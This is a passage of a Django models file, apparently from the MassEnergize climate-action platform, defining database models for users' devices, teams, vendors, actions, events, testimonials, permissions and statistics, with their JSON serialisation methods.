get_json_if_not_none(self.profile_picture) data["visit_log"] = self.visit_log return data class Meta: db_table = "user_profiles" ordering = ("-created_at",) class UserMediaUpload(models.Model): """A class that creates a relationship between a user(all user kinds) on the platform and media they have uploaded""" id = models.AutoField(primary_key=True) user = models.ForeignKey( UserProfile, null=True, related_name="uploads", on_delete=models.DO_NOTHING, ) communities = models.ManyToManyField( Community, related_name="community_uploads", ) media = models.OneToOneField( Media, null=True, related_name="user_upload", on_delete=models.CASCADE, ) is_universal = BooleanField( default=False ) # True value here means image is available to EVERYONE, and EVERY COMMUNITY settings = models.JSONField(null=True, blank=True) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) def __str__(self): return f"{str(self.id)} - {self.media.name} from {self.user.preferred_name or self.user.full_name} " def simple_json(self): res = model_to_dict( self, ["settings", "media", "created_at", "id", "is_universal"] ) res["user"] = get_summary_info(self.user) res["image"] = get_json_if_not_none(self.media) res["communities"] = [get_summary_info(com) for com in self.communities.all()] return res def full_json(self): return self.simple_json() class DeviceProfile(models.Model): """ A class used to represent a MassEnergize User's Device Attributes ---------- user_profiles : JSON A JSON object containing all user ids (as foreign keys) for any users asociated with this device. IP_address: Char The asociated IP address with this device. device_type: Char The type of device we see from the HTTP request. operating_system: The operating system we see from the HTTP request. browser: The browser we see from the HTTP request. visit_log: A JSON object containing a history of dates. Activity will only be logged here if there is a user attached to the device and they are logged in. #TODO: """ id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=True) user_profiles = models.ManyToManyField(UserProfile, blank=True) ip_address = models.CharField(max_length=SHORT_STR_LEN, null=True) location = models.ManyToManyField(Location, blank=True) device_type = models.CharField(max_length=SHORT_STR_LEN, null=True) operating_system = models.CharField(max_length=SHORT_STR_LEN, null=True) browser = models.CharField(max_length=SHORT_STR_LEN, null=True) visit_log = models.JSONField(default=list, null=True, blank=True) is_deleted = models.BooleanField(default=False, blank=True) def get_user_profiles(self): return json.load(self.user_profiles) def get_visit_log(self): return json.load(self.visit_log) def update_device_location(self, location): self.location.add(location) def update_user_profiles(self, user): self.user_profiles.add(user) def update_visit_log(self, date_time): try: new_format = "%Y/%m/%d" date = date_time.strftime(new_format) # We adapt the old fomat to the new one if type(self.visit_log) == dict: old = self.visit_log new = [] for day in old.keys(): old_format = "%d/%m/%Y" dt_object = datetime.datetime.strptime(day, old_format) day = dt_object.strftime(new_format) new.append(day) self.visit_log = new if type(self.visit_log) == list: if len(self.visit_log) > 0: if date != self.visit_log[-1]: self.visit_log.append(date) else: self.visit_log.append(date) except Exception as e: print(e) return None, e def simple_json(self): res = model_to_dict( self, [ "id", "ip_address", "device_type", "operating_system", "browser", "visit_log", "is_deleted", ], ) res["user_profiles"] = [u.simple_json() for u in self.user_profiles.all()] return res def full_json(self): return self.simple_json() class CommunityMember(models.Model): id = models.AutoField(primary_key=True) community = models.ForeignKey(Community, on_delete=models.CASCADE) user = models.ForeignKey(UserProfile, on_delete=models.CASCADE) is_admin = models.BooleanField(blank=True, default=False) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) is_deleted = models.BooleanField(default=False, blank=True) def __str__(self): return f"{self.user} is {'an ADMIN' if self.is_admin else 'a MEMBER'} in Community({self.community})" def simple_json(self): res = model_to_dict(self, ["id", "is_admin"]) res["community"] = get_summary_info(self.community) res["user"] = get_summary_info(self.user) return res def full_json(self): return self.simple_json() class Meta: db_table = "community_members_and_admins" unique_together = [["community", "user"]] ordering = ("-created_at",) class Subdomain(models.Model): id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN, unique=True) community = models.ForeignKey( Community, on_delete=models.SET_NULL, null=True, related_name="subdomain_community", ) in_use = models.BooleanField(default=False, blank=True) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) def __str__(self): return f"{self.community} - {self.name}" def simple_json(self): res = model_to_dict(self, ["id", "in_use", "name", "created_at", "updated_at"]) res["community"] = get_summary_info(self.community) return res def full_json(self): return self.simple_json() class Meta: db_table = "subdomains" class CustomCommunityWebsiteDomain(models.Model): id = models.AutoField(primary_key=True) website = models.CharField(max_length=SHORT_STR_LEN, unique=True) community = models.ForeignKey( Community, on_delete=models.SET_NULL, null=True, related_name="community_website", ) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) def __str__(self): return f"{self.website}-{self.community}" def simple_json(self): res = model_to_dict(self, ["id", "website", "created_at", "updated_at"]) res["community"] = get_summary_info(self.community) return res def full_json(self): return self.simple_json() class Meta: db_table = "custom_community_website_domain" class Team(models.Model): """ A class used to represent a Team in a community Attributes ---------- name : str name of the team. Need not be unique description: str description of this team admins: ManyToMany administrators for this team members: ManyToMany the team members community: which community this team is a part of logo: Foreign Key to Media file represtenting the logo for this team banner: Foreign Key to Media file represtenting the banner for this team created_at: DateTime The date and time that this goal was added created_at: DateTime The date and time of the last time any updates were made to the information about this goal """ id = models.AutoField(primary_key=True) # Team names should be unique globally (Not!) name = models.CharField(max_length=SHORT_STR_LEN) tagline = models.CharField(max_length=SHORT_STR_LEN, blank=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) admins = models.ManyToManyField(UserProfile, related_name="team_admins", blank=True) # not used members = models.ManyToManyField( UserProfile, related_name="team_members", blank=True ) # change this from ForeignKey to ManyToManyField to allow team to span communities # rename community to primary_community - this is the one whose cadmin can add/delete other communities, and which is unique with name communities = models.ManyToManyField( Community, related_name="community_teams", blank=True ) primary_community = models.ForeignKey( Community, related_name="primary_community_teams", on_delete=models.CASCADE ) images = models.ManyToManyField( Media, related_name="teams" ) # 0 or more photos - could be a slide show video_link = models.CharField( max_length=LONG_STR_LEN, blank=True ) # allow one video is_closed = models.BooleanField( default=False, blank=True ) # by default, teams are open team_page_options = models.JSONField( blank=True, null=True ) # settable team page options parent = models.ForeignKey( "self", null=True, on_delete=models.SET_NULL ) # for the case of sub-teams goal = models.ForeignKey(Goal, blank=True, null=True, on_delete=models.SET_NULL) logo = models.ForeignKey( Media, on_delete=models.SET_NULL, null=True, blank=True, related_name="team_logo", ) banner = models.ForeignKey( Media, on_delete=models.SET_NULL, null=True, blank=True, related_name="team_banner", ) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def is_admin(self, UserProfile): return self.admins.filter(id=UserProfile.id) # def is_member(self, UserProfile): # return self.members.filter(id=UserProfile.id) def __str__(self): return self.name def info(self): return model_to_dict(self, ["id", "name", "tagline", "description"]) def simple_json(self): res = self.info() res["primary_community"] = get_json_if_not_none(self.primary_community) res["logo"] = get_json_if_not_none(self.logo) res["is_closed"] = self.is_closed res["is_published"] = self.is_published res["parent"] = get_json_if_not_none(self.parent) return res def full_json(self): data = self.simple_json() # Q: should this be in simple_json? data["communities"] = [c.simple_json() for c in self.communities.all()] data["admins"] = [a.simple_json() for a in self.admins.all()] data["members"] = [m.simple_json() for m in self.members.all()] data["goal"] = get_json_if_not_none(self.goal) data["banner"] = get_json_if_not_none(self.banner) return data class Meta: ordering = ("name",) db_table = "teams" unique_together = [["primary_community", "name"]] class TeamMember(models.Model): id = models.AutoField(primary_key=True) team = models.ForeignKey(Team, on_delete=models.CASCADE) user = models.ForeignKey(UserProfile, on_delete=models.CASCADE) is_admin = models.BooleanField(blank=True, default=False) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) is_deleted = models.BooleanField(default=False, blank=True) def __str__(self): return f"{self.user} is {'an ADMIN' if self.is_admin else 'a MEMBER'} in Team({self.team})" def simple_json(self): res = model_to_dict(self, ["id", "is_admin"]) res["team"] = get_summary_info(self.team) res["user"] = get_summary_info(self.user) return res def full_json(self): return self.simple_json() class Meta: db_table = "team_members_and_admins" unique_together = [["team", "user"]] class Service(models.Model): """ A class used to represent a Service provided by a Vendor Attributes ---------- name : str name of the service description: str description of this service image: int Foreign Key to a Media file represtenting an image for this service if any icon: str a string description of an icon class for this service if any info: JSON any another dynamic information we would like to store about this Service created_at: DateTime The date and time that this goal was added created_at: DateTime The date and time of the last time any updates were made to the information about this goal """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN, unique=True) description = models.CharField(max_length=LONG_STR_LEN, blank=True) service_location = models.JSONField(blank=True, null=True) image = models.ForeignKey(Media, blank=True, null=True, on_delete=models.SET_NULL) icon = models.CharField(max_length=SHORT_STR_LEN, blank=True) info = models.JSONField(blank=True, null=True) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return self.name def simple_json(self): return model_to_dict( self, ["id", "name", "description", "service_location", "icon"] ) def full_json(self): return self.simple_json() class Meta: db_table = "services" class ActionProperty(models.Model): """ A class used to represent an Action property. Attributes ---------- name : str name of the Vendor """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN, unique=True) short_description = models.CharField(max_length=LONG_STR_LEN, blank=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return self.name def simple_json(self): return model_to_dict(self) def full_json(self): return self.full_json() class Meta: verbose_name_plural = "Properties" ordering = ("id",) db_table = "action_properties" class CarbonEquivalency(models.Model): """ Represents an carbon equivalency that can make carbon impact more comprehensible to users. Attributes ---------- name : str Name of the unit used. E.g. "Tree" value: int Value is how many pounds per year of CO2 per unit of this. Use https://www.epa.gov/energy/greenhouse-gas-equivalencies-calculator icon: Graphic representing the appropriate equivalancey. explanation: str Additional information on the equivelancy. E.g. "A typical hardwood tree can absorb as much as 48 pounds of carbon dioxide per year" reference: str Source of information used. Link, book, study, etc. date: DateTime Timestamp of when the equivilancy was last modified. """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=50) value = models.FloatField() icon = models.CharField(max_length=50) title = models.CharField(max_length=40, null=True, blank=True) explanation = models.CharField(max_length=100) reference = models.CharField(max_length=100) date = models.DateTimeField(auto_now=True) def __str__(self): return self.name def simple_json(self): return model_to_dict(self) def full_json(self): return self.simple_json() class Meta: verbose_name_plural = "CarbonEquivalencies" ordering = ("id",) db_table = "carbon_equivalencies" class TagCollection(models.Model): """ A class used to represent a collection of Tags. Attributes ---------- name : str name of the Tag Collection """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN, unique=True) is_global = models.BooleanField(default=False, blank=True) allow_multiple = models.BooleanField(default=False) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) rank = models.PositiveIntegerField(default=0) def __str__(self): return self.name def simple_json(self): res = model_to_dict(self) res["tags"] = [t.simple_json() for t in self.tag_set.all()] return res def full_json(self): return self.simple_json() class Meta: ordering = ("name",) db_table = "tag_collections" class Tag(models.Model): """ A class used to represent an Tag. It is essentially a string that can be used to describe or group items, actions, etc Attributes ---------- name : str name of the Tag """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN) points = models.PositiveIntegerField(null=True, blank=True) icon = models.CharField(max_length=SHORT_STR_LEN, blank=True) tag_collection = models.ForeignKey( TagCollection, null=True, on_delete=models.CASCADE, blank=True ) rank = models.PositiveIntegerField(default=0) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return "%s - %s" % (self.name, self.tag_collection) def simple_json(self): res = model_to_dict(self) res["order"] = self.rank res["tag_collection_name"] = ( None if not self.tag_collection else self.tag_collection.name ) return res def full_json(self): data = self.simple_json() data["tag_collection"] = get_json_if_not_none(self.tag_collection) return data class Meta: ordering = ("rank",) db_table = "tags" unique_together = [["rank", "name", "tag_collection"]] class Vendor(models.Model): """ A class used to represent a Vendor/Contractor that provides a service associated with any of the actions. Attributes ---------- name : str name of the Vendor description: str description of this service logo: int Foreign Key to Media file represtenting the logo for this Vendor banner: int Foreign Key to Media file represtenting the banner for this Vendor address: int Foreign Key for Location of this Vendor key_contact: int Foreign Key for MassEnergize User that is the key contact for this vendor service_area: str Information about whether this vendor provides services nationally, statewide, county or Town services only properties_services: str Whether this vendor services Residential or Commercial units only onboarding_date: DateTime When this vendor was onboard-ed on the MassEnergize Platform for this community onboarding_contact: Which MassEnergize Staff/User onboard-ed this vendor verification_checklist: contains information about some steps and checks needed for due diligence to be done on this vendor eg. Vendor MOU, Reesearch is_verified: boolean When the checklist items are all done and verified then set this as True to confirm this vendor more_info: JSON any another dynamic information we would like to store about this Service created_at: DateTime The date and time that this Vendor was added created_at: DateTime The date and time of the last time any updates were made to the information about this Vendor """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN, unique=True) phone_number = models.CharField(max_length=SHORT_STR_LEN, blank=True) email = models.EmailField(blank=True, null=True, db_index=True) description = models.CharField(max_length=LONG_STR_LEN, blank=True) logo = models.ForeignKey( Media, blank=True, null=True, on_delete=models.SET_NULL, related_name="vender_logo", ) banner = models.ForeignKey( Media, blank=True, null=True, on_delete=models.SET_NULL, related_name="vendor_banner", ) address = models.JSONField(blank=True, null=True) key_contact = models.JSONField(blank=True, null=True) service_area = models.CharField(max_length=SHORT_STR_LEN) service_area_states = models.JSONField(blank=True, null=True) services = models.ManyToManyField(Service, blank=True) properties_serviced = models.JSONField(blank=True, null=True) onboarding_date = models.DateTimeField(auto_now_add=True) onboarding_contact = models.ForeignKey( UserProfile, blank=True, null=True, on_delete=models.SET_NULL, related_name="onboarding_contact", ) verification_checklist = models.JSONField(blank=True, null=True) is_verified = models.BooleanField(default=False, blank=True) location = models.JSONField(blank=True, null=True) more_info = models.JSONField(blank=True, null=True) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) communities = models.ManyToManyField( Community, blank=True, related_name="community_vendors" ) tags = models.ManyToManyField(Tag, related_name="vendor_tags", blank=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return self.name def info(self): data = model_to_dict( self, ["id", "name", "service_area", "key_contact", "phone_number", "email"] ) data["logo"] = get_json_if_not_none(self.logo) return data def simple_json(self): data = model_to_dict( self, exclude=[ "logo", "banner", "services", "onboarding_contact", "more_info", "services", "communities", ], ) data["services"] = [s.simple_json() for s in self.services.all()] data["communities"] = [c.simple_json() for c in self.communities.all()] data["tags"] = [t.simple_json() for t in self.tags.all()] data["logo"] = get_json_if_not_none(self.logo) data["website"] = self.more_info and self.more_info.get("website", None) data["key_contact"] = self.key_contact return data def full_json(self): data = model_to_dict( self, exclude=["logo", "banner", "services", "onboarding_contact"] ) data["onboarding_contact"] = get_json_if_not_none(self.onboarding_contact) data["logo"] = get_json_if_not_none(self.logo) data["more_info"] = self.more_info data["tags"] = [t.simple_json() for t in self.tags.all()] data["banner"] = get_json_if_not_none(self.banner) data["services"] = [s.simple_json() for s in self.services.all()] data["communities"] = [c.simple_json() for c in self.communities.all()] data["website"] = self.more_info and self.more_info.get("website", None) data["key_contact"] = self.key_contact data["location"] = self.location return data class Meta: db_table = "vendors" class Action(models.Model): """ A class used to represent an Action that can be taken by a user on this website. Attributes ---------- title : str A short title for this Action. is_global: boolean True if this action is a core action that every community should see or not. False otherwise. about: str More descriptive information about this action. steps_to_take: str Describes the steps that can be taken by an a user for this action; icon: str a string description of the icon class for this action if any image: int Media a Foreign key to an uploaded media file average_carbon_score: the average carbon score for this action as given by the carbon calculator geographic_area: str the Location where this action can be taken created_at: DateTime The date and time that this real estate unity was added created_at: DateTime The date and time of the last time any updates were made to the information about this real estate unit """ id = models.AutoField(primary_key=True) title = models.CharField(max_length=SHORT_STR_LEN, db_index=True) is_global = models.BooleanField(default=False, blank=True) featured_summary = models.TextField(max_length=LONG_STR_LEN, blank=True, null=True) steps_to_take = models.TextField(max_length=LONG_STR_LEN, blank=True) deep_dive = models.TextField(max_length=LONG_STR_LEN, blank=True) about = models.TextField(max_length=LONG_STR_LEN, blank=True) # TODO: this wasn't fully implemented - may remove primary_category # this is the singal category which points will be recorded in, though primary_category = models.ForeignKey( Tag, related_name="action_category", on_delete=models.SET_NULL, null=True ) # then - an action could have multiple secondary categories tags = models.ManyToManyField(Tag, related_name="action_tags", blank=True) geographic_area = models.JSONField(blank=True, null=True) icon = models.CharField(max_length=SHORT_STR_LEN, blank=True) image = models.ForeignKey( Media, on_delete=models.SET_NULL, null=True, blank=True, related_name="actions" ) properties = models.ManyToManyField(ActionProperty, blank=True) vendors = models.ManyToManyField(Vendor, blank=True) calculator_action = models.ForeignKey( CCAction, blank=True, null=True, on_delete=models.SET_NULL ) average_carbon_score = models.TextField(max_length=SHORT_STR_LEN, blank=True) community = models.ForeignKey( Community, on_delete=models.SET_NULL, null=True, blank=True, db_index=True ) rank = models.PositiveSmallIntegerField(default=0, blank=True) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return self.title def info(self): return model_to_dict(self, ["id", "title"]) def simple_json(self): data = model_to_dict( self, [ "id", "is_published", "is_deleted", "title", "is_global", "icon", "rank", "average_carbon_score", "featured_summary", ], ) data["image"] = get_json_if_not_none(self.image) data["calculator_action"] = get_summary_info(self.calculator_action) data["tags"] = [t.simple_json() for t in self.tags.all()] data["steps_to_take"] = self.steps_to_take data["deep_dive"] = self.deep_dive data["about"] = self.about data["community"] = get_summary_info(self.community) data["vendors"] = [v.info() for v in self.vendors.all()] return data def full_json(self): data = self.simple_json() data["is_global"] = self.is_global data["steps_to_take"] = self.steps_to_take data["about"] = self.about data["geographic_area"] = self.geographic_area data["properties"] = [p.simple_json() for p in self.properties.all()] data["vendors"] = [v.simple_json() for v in self.vendors.all()] return data class Meta: ordering = ["rank", "title"] db_table = "actions" unique_together = [["title", "community"]] class Event(models.Model): """ A class used to represent an Event. Attributes ---------- name : str name of the event description: str more details about this event start_date_and_time: Datetime when the event starts (both the day and time) end_date_and_time: Datetime when the event ends location: Location where the event is taking place tags: ManyToMany tags on this event to help in easily filtering image: Media Foreign key linking to the image attached to this event. archive: boolean True if this event should be archived is_global: boolean True if this action is an event that every community should see or not. False otherwise. is_recurring: boolean if the event is recurring, this value is True and it has a RecurringPattern instance attached to it. recurring_details: JSON stores information about the recurrence pattern of the event if is_recurring = True """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN) featured_summary = models.TextField(max_length=LONG_STR_LEN, blank=True, null=True) description = models.TextField(max_length=LONG_STR_LEN) community = models.ForeignKey(Community, on_delete=models.CASCADE, null=True) invited_communities = models.ManyToManyField( Community, related_name="invited_communites", blank=True ) start_date_and_time = models.DateTimeField(db_index=True) end_date_and_time = models.DateTimeField(db_index=True) location = models.JSONField(blank=True, null=True) tags = models.ManyToManyField(Tag, blank=True) image = models.ForeignKey( Media, on_delete=models.SET_NULL, null=True, blank=True, related_name="events" ) archive = models.BooleanField(default=False, blank=True) is_global = models.BooleanField(default=False, blank=True) external_link = models.CharField(max_length=SHORT_STR_LEN, blank=True) is_external_event = models.BooleanField(default=False, blank=True) more_info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) rank = models.PositiveIntegerField(default=0, blank=True, null=True) is_recurring = models.BooleanField(default=False, blank=True, null=True) recurring_details = models.JSONField(blank=True, null=True) def __str__(self): return self.name def simple_json(self): data = model_to_dict( self, exclude=["tags", "image", "community", "invited_communities"] ) data["start_date_and_time"] = self.start_date_and_time data["end_date_and_time"] = self.end_date_and_time data["tags"] = [t.simple_json() for t in self.tags.all()] data["community"] = get_json_if_not_none(self.community) data["image"] = None if not self.image else self.image.full_json() data["invited_communities"] = [ c.simple_json() for c in self.invited_communities.all() ] data["more_info"] = self.more_info return data def full_json(self): return self.simple_json() class Meta: ordering = ( "rank", "-start_date_and_time", ) db_table = "events" # leaner class that stores information about events that have already passed # in the future, can use this class to revive events that may have been archived class PastEvent(models.Model): id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN) description = models.TextField(max_length=LONG_STR_LEN) start_date_and_time = models.DateTimeField() community = models.ForeignKey(Community, on_delete=models.CASCADE) class RecurringEventException(models.Model): """ A class used to represent a RESCHEDULING of a recurring event. Attributes ---------- event: Event stores the recurring event that the exception is attached to rescheduled_event: Event if the event instance is rescheduled, a new Event is created representing the rescheduled event instance is_cancelled : boolean True if the event has been cancelled by CAdmin is_rescheduled: boolean True if event has been rescheduled by CAdmin former_time: dateTime Tells us when the instance was originally scheduled. Helps us figure out when to delete RecurringEventException """ id = models.AutoField(primary_key=True) event = models.ForeignKey( Event, on_delete=models.CASCADE, related_name="recurring_event" ) rescheduled_event = models.ForeignKey( Event, on_delete=models.CASCADE, blank=True, null=True ) # shouldnt be this way - blank should be false, but I don't know what to set the default to former_time = models.DateTimeField(null=True, blank=True) def __str__(self): return str(self.id) def simple_json(self): data = model_to_dict(self, exclude=["event", "rescheduled_event"]) data["id"] = str(self.id) data["former_time"] = str(self.former_time) data["event"] = self.event.id data["rescheduled_start_time"] = str(self.rescheduled_event.start_date_and_time) data["rescheduled_end_time"] = str(self.rescheduled_event.end_date_and_time) return data class EventAttendee(models.Model): """ A class used to represent events and attendees Attributes ---------- user : Foreign Key of the User Which user this applies to status: str Tells if the user is just interested, RSVP-ed or saved for later. event: int Foreign Key to event that the user has responded to. """ id = models.AutoField(primary_key=True) user = models.ForeignKey(UserProfile, on_delete=models.CASCADE) event = models.ForeignKey(Event, on_delete=models.CASCADE) status = models.CharField( max_length=TINY_STR_LEN, choices=CHOICES.get("EVENT_CHOICES", {}).items() ) updated_at = models.DateTimeField(auto_now=True) is_deleted = models.BooleanField(default=False, blank=True) def __str__(self): return "%s | %s | %s" % (self.user, self.status, self.event) def simple_json(self): data = model_to_dict(self, ["id", "status"]) data["user"] = self.user.info() data["event"] = self.event.info() return data def full_json(self): return self.simple_json() class Meta: verbose_name_plural = "Event Attendees" db_table = "event_attendees" unique_together = [["user", "event"]] class Permission(models.Model): """ A class used to represent Permission(s) that are required by users to perform any tasks on this platform. Attributes ---------- name : str name of the Vendor """ id = models.AutoField(primary_key=True) name = models.CharField( max_length=TINY_STR_LEN, choices=CHOICES.get("PERMISSION_TYPES", {}).items(), db_index=True, ) description = models.TextField(max_length=LONG_STR_LEN, blank=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return CHOICES.get("PERMISSION_TYPES", {})[self.name] def simple_json(self): return model_to_dict(self) def full_json(self): return self.simple_json() class Meta: ordering = ("name",) db_table = "permissions" class UserPermissions(models.Model): """ A class used to represent Users and what they can do. Attributes ---------- who : int the user on this site can_do: int Foreign Key desscribing the policy that they can perform """ id = models.AutoField(primary_key=True) who = models.ForeignKey(Role, on_delete=models.CASCADE) can_do = models.ForeignKey(Permission, on_delete=models.CASCADE) is_deleted = models.BooleanField(default=False, blank=True) def __str__(self): return "(%s) can (%s)" % (self.who, self.can_do) def simple_json(self): return { "id": self.id, "who": get_json_if_not_none(self.who), "can_do": get_json_if_not_none(self.can_do), } def full_json(self): return self.simple_json() class Meta: ordering = ("who",) db_table = "user_permissions" class Testimonial(models.Model): """ A class used to represent a Testimonial shared by a user. Attributes ---------- title : str title of the testimony body: str (HTML) more information for this testimony. is_approved: boolean after the community admin reviews this, he can check the box """ id = models.AutoField(primary_key=True) title = models.CharField(max_length=SHORT_STR_LEN, db_index=True) body = models.TextField(max_length=LONG_STR_LEN) is_approved = models.BooleanField(default=False, blank=True) tags = models.ManyToManyField(Tag, blank=True) image = models.ForeignKey( Media, on_delete=models.SET_NULL, null=True, blank=True, related_name="testimonials", ) user = models.ForeignKey( UserProfile, on_delete=models.CASCADE, db_index=True, null=True ) action = models.ForeignKey( Action, on_delete=models.CASCADE, null=True, db_index=True ) vendor = models.ForeignKey( Vendor, on_delete=models.SET_NULL, null=True, blank=True, db_index=True ) community = models.ForeignKey( Community, on_delete=models.CASCADE, blank=True, null=True, db_index=True ) rank = models.PositiveSmallIntegerField(default=0) created_at = models.DateTimeField(auto_now_add=True, blank=True) updated_at = models.DateTimeField(auto_now=True, blank=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) anonymous = models.BooleanField(default=False, blank=True) preferred_name = models.CharField(max_length=SHORT_STR_LEN, blank=True, null=True) other_vendor = models.CharField(max_length=SHORT_STR_LEN, blank=True, null=True) def __str__(self): return self.title def info(self): return model_to_dict(self, fields=["id", "title", "community"]) def _get_user_info(self): return get_json_if_not_none(self.user) or { "full_name": "User unknown", "email": "e-mail address not provided", } def simple_json(self): res = model_to_dict(self, exclude=["image", "tags"]) res["user"] = self._get_user_info() res["action"] = get_json_if_not_none(self.action) res["vendor"] = None if not self.vendor else self.vendor.info() res["community"] = get_json_if_not_none(self.community) res["created_at"] = self.created_at.date() res["file"] = get_json_if_not_none(self.image) res["tags"] = [t.simple_json() for t in self.tags.all()] res["anonymous"] = self.anonymous res["preferred_name"] = self.preferred_name res["other_vendor"] = self.other_vendor return res def full_json(self): data = self.simple_json() data["image"] = data.get("file", None) data["tags"] = [t.simple_json() for t in self.tags.all()] return data class Meta: ordering = ("rank",) db_table = "testimonials" class UserActionRel(models.Model): """ A class used to represent a user and his/her relationship with an action. Whether they marked an action as todo, done, etc Attributes ---------- user : int Foreign Key for user real_estate_unit: Foreign key for the real estate unit this action is related to. action: int which action they marked vendor: which vendor they choose to contact/connect with status: Whether they marked it as todo, done or save for later date_completed: If specified, the date when they completed the action carbon_impact: Carbon reduction calculated by the Carbon Calculator """ id = models.AutoField(primary_key=True) user = models.ForeignKey(UserProfile, on_delete=models.CASCADE, db_index=True) real_estate_unit = models.ForeignKey(RealEstateUnit, on_delete=models.CASCADE) action = models.ForeignKey(Action, on_delete=models.CASCADE) vendor = models.ForeignKey(Vendor, on_delete=models.SET_NULL, null=True, blank=True) status = models.CharField( max_length=SHORT_STR_LEN, choices=CHOICES.get("USER_ACTION_STATUS", {}).items(), db_index=True, default="TODO", ) date_completed = models.DateField(blank=True, null=True) carbon_impact = models.IntegerField( default=0 ) # that which was calculated by the Carbon Calculator created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) is_deleted = models.BooleanField(default=False, blank=True) def simple_json(self): return { "id": self.id, "user": get_json_if_not_none(self.user), "action": get_json_if_not_none(self.action), "real_estate_unit": get_json_if_not_none(self.real_estate_unit), "status": self.status, "date_completed": self.date_completed, "carbon_impact": self.carbon_impact, } def full_json(self): res = self.simple_json() res["vendor"] = get_json_if_not_none(self.vendor) return res def __str__(self): return "%s | %s | (%s)" % (self.user, self.status, self.action) class Meta: ordering = ("status", "user", "action") unique_together = [["user", "action", "real_estate_unit"]] class CommunityAdminGroup(models.Model): """ This represents a binding of a group of users and a community for which they are admin for. Attributes ---------- name : str name of the page section info: JSON dynamic information goes in here """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN, unique=True, db_index=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) community = models.ForeignKey(Community, on_delete=models.CASCADE, blank=True) members = models.ManyToManyField(UserProfile, blank=True) is_deleted = models.BooleanField(default=False, blank=True) pending_admins = models.JSONField(blank=True, null=True) def __str__(self): return self.name def simple_json(self): res = model_to_dict(self, exclude=["members"]) res["community"] = get_json_if_not_none(self.community) res["members"] = [m.simple_json() for m in self.members.all()] return res def full_json(self): return self.simple_json() class Meta: ordering = ("name",) db_table = "community_admin_group" class UserGroup(models.Model): """ This represents a binding of a group of users and a community and the permissions they have. Attributes ---------- name : str name of the page section info: JSON dynamic information goes in here """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN, unique=True, db_index=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) community = models.ForeignKey( Community, on_delete=models.CASCADE, blank=True, db_index=True ) members = models.ManyToManyField(UserProfile, blank=True) permissions = models.ManyToManyField(Permission, blank=True) is_deleted = models.BooleanField(default=False, blank=True) def __str__(self): return self.name def simple_json(self): return model_to_dict(self, exclude=["members", "permissions"]) def full_json(self): data = self.simple_json() data["community"] = get_json_if_not_none(self.community) data["members"] = [m.simple_json() for m in self.members.all()] data["permissions"] = [p.simple_json() for p in self.permissions.all()] return data class Meta: ordering = ("name",) db_table = "user_groups" class Data(models.Model): """Instances of data points Attributes ---------- name : str name of the statistic value: decimal The value of the statistic goes here info: JSON dynamic information goes in here. The symbol and other info goes here community: int foreign key linking a community to this statistic """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN, db_index=True) value = models.PositiveIntegerField(default=0) reported_value = models.PositiveIntegerField(default=0) denominator = models.CharField(max_length=SHORT_STR_LEN, blank=True) symbol = models.CharField(max_length=LONG_STR_LEN, blank=True) tag = models.ForeignKey( Tag, blank=True, on_delete=models.CASCADE, null=True, db_index=True ) community = models.ForeignKey( Community, blank=True, on_delete=models.SET_NULL, null=True, db_index=True ) info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=True) def __str__(self): return "%s | %s (%d) |(%s)" % (self.community, self.name, self.value, self.tag) def simple_json(self): return model_to_dict(self, fields=["id", "name", "value", "reported_value"]) def full_json(self): data = self.simple_json() data["tag"] = get_json_if_not_none(self.tag) data["community"] = get_json_if_not_none(self.community) return data class Meta: verbose_name_plural = "Data" ordering = ("name", "value") db_table = "data" class Graph(models.Model): """Instances keep track of a statistic from the admin Attributes ---------- title : str the title of this graph type: str the type of graph to be plotted eg. pie chart, bar chart etc data: JSON data to be plotted on this graph """ id = 